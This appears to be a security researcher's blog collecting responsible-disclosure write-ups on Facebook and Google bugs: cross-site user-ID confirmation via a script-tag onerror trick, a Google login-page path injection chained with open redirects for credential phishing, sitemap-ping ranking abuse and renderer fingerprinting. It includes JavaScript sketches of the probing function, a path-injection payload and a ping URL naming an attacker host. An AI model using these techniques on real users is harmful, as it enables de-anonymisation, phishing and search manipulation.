I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), so I am publishing the details so that site owners and companies can defend their own sites against this sort of attack. Google have now told me they have no immediate plans to remedy this.
I discovered a bug that would let any web page identify a logged-in Facebook user by confirming their ID. Facebook fixed it within 6-9 months and awarded a $1000 bounty.
In last year's coverage of the Facebook / Cambridge Analytica privacy concerns, Mark Zuckerberg was asked to testify before Congress, and one of the questions asked was whether Facebook could track users even on other websites. There was a lot of news coverage of this aspect of Facebook, and a lot of people were up in arms. As one part of their response, Facebook launched a Data Abuse Bounty, with the aim of protecting user data from abuse.
So, having recently found a bug in Google's search engine, I set out to see whether I could track or identify Facebook users when they were on other sites. After a few false starts, I managed to find a bug which allows me to identify whether a visitor is logged in to a specific Facebook account, checking hundreds of identities per second (around 500 per second).
I have created a proof of concept of the attack (now fixed), which checks a small known list of IDs but also allows you to enter an ID, confirming whether you are logged in to that account or not.
Facebook has a lot of backend endpoints which are used for various AJAX requests across the site. Almost all of them are protected by access-control-allow-origin headers and magic prefixes on JSON responses that prevent JSON hijacking and other nasty attacks.
I searched across the site looking for any endpoints that didn't have these protections but did pass my user ID in the URL, looking for any way I might be able to parse a response from Facebook to confirm whether the UID in the URL was correct.
I also looked for any images that include the user ID in the URL and behave differently when the UID matches the logged-in user (so I could do something similar to this method, but for specific IDs); the closest I got was an image that did behave differently, but the URL also included Facebook's well-known fb_dtsg parameter, which is unique per user (and changes regularly), preventing it from being abused.
In addition I checked for any 301/302s in these URLs which might represent an opportunity to redirect to an image in a fashion that would allow the same trick as above.
After carefully checking dozens of these endpoints I eventually found one with a slight inconsistency in how it behaved; a small gap, but a weakness. It did have an access-control-allow-origin header, but it only included a magic prefix when the user ID (in the __user URL parameter) didn't match, not when it did. When the user ID provided in the URL matched, the response was pure JSON.
However, because of the pesky access-control-allow-origin header, I couldn't call this via an XHR request, as the browser would block it. At this point I thought it might be another dead end, but I eventually realised that I could use it as the src for a normal <script> block; this would of course fail, but importantly it fails in a different way in each of the two cases (due also to the content-type header), and in such a fashion that the difference can be detected via onerror event handlers.
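The detection can be sketched roughly like this (the endpoint URL here is a placeholder, not the real Facebook one, and the exact failure modes vary by browser):

```javascript
// Hypothetical endpoint; the real one was a Facebook AJAX endpoint
// that omitted the "for (;;);" prefix only when __user matched the
// logged-in user.
var ENDPOINT = 'https://www.example.com/ajax/endpoint';

function checkUid(uid, callback) {
  var matched = false;
  // Bare JSON served as a script surfaces a parse error on
  // window.onerror; the prefixed (non-matching) response fails
  // differently, so the two cases can be told apart.
  var prevHandler = window.onerror;
  window.onerror = function () { matched = true; return true; };
  var s = document.createElement('script');
  s.src = ENDPOINT + '?__user=' + encodeURIComponent(uid);
  s.onload = s.onerror = function () {
    window.onerror = prevHandler;
    document.head.removeChild(s);
    callback(matched);
  };
  document.head.appendChild(s);
}
```

Calling this in a loop over a list of candidate IDs is what makes the "hundreds per second" checking rate possible.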
Here is an example of the URL for the endpoint:
I'm not sure there is a good reason not to be prefixing this JSON; the nice thing is that Facebook's preferred prefix (for (;;);) produces an invalid UTF-16BE character, so it would prevent the attack. Furthermore, if the string is valid then Safari still seems to try to execute the script, which would also prevent the attack. Without the prefix, there are confirmed to be JSON snippets which are susceptible to this attack; whether any exist on Facebook I don't know, but it seems risky. I may be misunderstanding the risks here, though.
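For context, this is how a legitimate first-party consumer deals with the prefix (a sketch; Facebook's own client code will differ):

```javascript
// Strip Facebook's anti-hijacking prefix before parsing. Included
// as a bare script, "for (;;);" loops forever, so a cross-origin
// <script src> inclusion never reaches the JSON payload; a same-origin
// XHR consumer just strips it first.
function parsePrefixedJson(text) {
  var PREFIX = 'for (;;);';
  if (text.indexOf(PREFIX) === 0) {
    text = text.slice(PREFIX.length);
  }
  return JSON.parse(text);
}

// parsePrefixedJson('for (;;);{"ok":true}') → { ok: true }
```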
I have created a small demo which demonstrates the attack. It checks a small list of known user IDs automatically when you arrive on the page, and also allows you to enter an ID on the page and will confirm whether you are logged in to that account.
This is limited in that you need to check against a known list of users, rather than being able to determine a visitor's identity automatically. However, anyone affected by the Cambridge Analytica data situation, whose data is already known, could now be identified and tracked across websites without the use of any Facebook APIs.
In addition, the most sinister exploiters of such a bug (e.g. a repressive regime) would likely have a list of people they cared about identifying (which they could narrow down further based on location and other factors). A final example might be anyone on a corporate IP address or network, where the list of users is probably fairly easy to harvest and fairly finite.
So the scope is fairly narrow, the impact on many may be small, but for some that impact could be high. This would certainly be a violation of privacy for any Facebook user who did get identified.
- 20th April 2018 – I filed the initial bug report.
- 20th April 2018 – Facebook replied letting me know this was being handed to the correct team to investigate.
- 1st May 2018 – I requested an update.
- 2nd May 2018 – FB replied – still investigating.
- 23rd May 2018 – I requested an update, noticing it was fixed in Chrome but not Safari.
- 23rd May 2018 – FB replied – they were investigating solutions.
- 20th June 2018 – FB awarded a $1000 bounty.
- 1st October 2018 – I requested permission to publish.
- 1st October 2018 – FB replied they were still working on the fix, and they’d update me.
- 19th February 2019 – I followed up and FB seemed happy for me to publish.
(It is unclear when the final fix rolled out – it looks like 6-9 months after I reported it.)
Specifically, it allows an attacker to craft a URL to an authentic Google login page (where the user must pick from a list of their accounts) such that the destination for any one of those accounts is a page the attacker controls.
Those of us with multiple Google accounts are quite accustomed to being presented with a list of those accounts, from which we need to select one to log in with. One form of this Google page embeds (for reasons lost on me) the list of email addresses to show inside the URL:
(It is normal for there to be only placeholder icons, hack or not)
I first discovered this page well over a year ago, but other than manipulating the email addresses to say rude words I couldn’t find much malicious to do with it. I recently re-discovered the page, and thought I would take another look at what I could do with it.
I discovered the page uses these parameters not only to present the list of email addresses but also as a factor in controlling where the login flow takes the user when they select an account, and the server-side validation involved fails.
Specifically, I found that if I presented emails in a certain format, the section after the @ symbol would be used as the path for the following page. Because it is a GSuite page, some server-side code attempts to parse the domain from the email and then use that to form the path for the following page. However, it does not validate the domain correctly, allowing an attacker to form arbitrary paths.
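A sketch of the flawed pattern, as I understand it (the /a/<domain>/ path template is illustrative; I don't know Google's actual server-side code):

```javascript
// Naive logic (illustrative): trust everything after '@' as the
// GSuite domain and splice it into the next-step path.
function nextStepPath(email) {
  var domain = email.split('@')[1]; // no validation of the "domain"
  return '/a/' + domain + '/signin';
}

// A well-formed address behaves as intended:
// nextStepPath('alice@example.com') → '/a/example.com/signin'
// But an attacker-controlled "email" injects an arbitrary path:
// nextStepPath('alice@example.com/../../evil/page')
//   → '/a/example.com/../../evil/page/signin'
```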
However, adding such a path did disfigure the listings on the page, making it obvious that something was amiss. To counteract this, I abused the fact that CSS was used to crop overly long email addresses; given that invalid email addresses are allowed through here, I simply dressed the entry up with the user's full name in front (as is standard on these pages most of the time anyway).
To get URL parameters to pass through, I simply put them in the URL before the list of u parameters specifying emails (marked in the screenshot), and these parameters would then be added to the destination path. You can see, marked in the screenshot, that this worked because window.location.pathname is used, which means the query string remains intact.
Now I was able to abuse an existing open redirect via a logout redirect page (so it doesn't require users to already be logged in to work), chained through another Google open redirect, to forward the user to any page of my choosing. There are many such open redirectors on Google.com, so there are many options for abusing this.
Here is a demo:
The redirect I am using shows a redirect message, but I did later side-step that. You could also redirect to a more misleading domain, of course. The result is that you start on an authentic Google account page, and when you select an account, expecting to be taken to a password entry page, you do arrive at one. However, this page is actually a malicious page controlled by the attacker, who is now going to steal your login details. They can then redirect you back to an official Google page to cover their tracks.
I reported this to Google who said they already had a bug filed against it, but after some back and forth it seems that was something else. Unfortunately, Google deemed it “does not meet the bar for a financial reward”.
17th July 2017 – I reported this to the security team via their form.
17th July 2017 – I heard back it was triaged and awaiting attention.
20th July 2017 – I followed up to supply some more information. I was concerned it would be flagged purely as a phishing issue, or open redirect. I also thought they may think it was just the issue that an attacker can control the list of accounts and miss the fact that the URL parsing is broken such that malicious links can be injected.
20th July 2017 – The team came back to me and told me they were already aware of this issue, so it was not eligible for a bug bounty.
21st July 2017 – I shared a draft of this write up with the Google team.
3rd August 2017 – Google came back letting me know they were working on the issue, but in doing so also revealed that (due to my poor explanation!) they had misunderstood the primary issue I was reporting.
4th+7th August 2017 – I replied giving some more details on the exact issue.
11th August 2017 – I followed up.
17th August 2017 – Google replied saying it was actually different, and saying I should follow up in 2-3 weeks.
14th September 2017 – I followed up.
15th September 2017 – Google security team replied saying they hadn’t heard back from the team responsible, and said they would follow up.
2nd October 2017 – I followed up.
12th October 2017 – Google team said still no status update.
3rd November 2017 – I followed up.
20th November 2017 – I followed up.
15th December 2017 – Google team said still no status update.
25th January 2018 – I followed up.
13th March 2018 – Google team said still no status update.
14th April 2018 – I followed up, now 9 months since report.
15th May 2018 – Google let me know a fix is a few days out.
8th June 2018 – Google confirm I can publish.
2nd August 2018 – Google confirmed it “does not meet the bar for a financial reward”.
Similar to the other bug that I recently reported, this is quite a specific attack as it needs to target a specific user, but it is potentially high impact. Furthermore, it may be that the missing validation on the parameter allows for other nefarious uses, but I didn’t dig deeper once I identified the issue.
As usual, a big thanks to the Google team! 🙂
For the $12 cost of a domain, I was able to rank in Google search results alongside Amazon, Walmart etc. for high-value money terms in the US. The Adwords bid price for some of these terms is currently around $1 per click, and companies are spending tens of thousands of dollars a month to appear as ads on these search results, yet I was appearing for free.
Google have now fixed the issue and awarded a bug bounty of $5000.
Google provides an open URL where you can ‘ping’ an XML sitemap which they will fetch and parse – this file can contain indexation directives. I discovered that for many sites it is possible to ping a sitemap that you (the attacker) are hosting in such a way that Google will trust the evil sitemap as belonging to the victim site.
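The ping mechanism can be sketched as follows (the open-redirect chaining is my reading of "in such a way", and all hostnames are placeholders):

```javascript
// Google's sitemap ping endpoint (as it worked at the time): anyone
// could ask Google to fetch and parse a sitemap at a given URL.
// One way to make Google attribute an attacker-hosted sitemap to the
// victim site (an assumption here, not spelled out above) is to ping
// a URL on the victim's own domain that openly redirects to it.
var sitemapUrl = 'https://victim.example/redirect?url=' +
                 encodeURIComponent('https://attacker.example/evil-sitemap.xml');
var pingUrl = 'https://www.google.com/ping?sitemap=' +
              encodeURIComponent(sitemapUrl);
// The attacker then simply requests pingUrl.
```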
I believe this is the first time they have awarded a bounty for a security issue in the actual search engine, which directly affects the ranking of sites.
In Google's renderer, the Math.random() function produces an entirely deterministic series. I created a small script which uses this to identify Google in an obfuscated fashion:
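A sketch of the idea, not the actual script (the fingerprint values below are placeholders, not real captured values; real ones would be gathered by logging Math.random() from a page the renderer fetches):

```javascript
// Placeholder fingerprint of the deterministic sequence.
var EXPECTED = [0.0071, 0.0042, 0.0913];

function looksLikeGoogleRenderer() {
  // With a deterministic PRNG the first draws always match the
  // recorded sequence; in a normal browser they essentially never do.
  return EXPECTED.every(function (v) {
    return Math.abs(Math.random() - v) < 1e-9;
  });
}
```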
I recently reported an issue to Google which allows an attacker to confirm whether a visitor to a web page is logged in to any one of a list of specific Google accounts (including GSuite accounts). It is possible to check about 1000 email addresses every 25 seconds. Google have confirmed this is working as intended, and do not consider it a bug.
You can test it out yourself on this demo page.
Firstly, a video of a proof of concept, where I identify an account (myself) against a list of 20 accounts: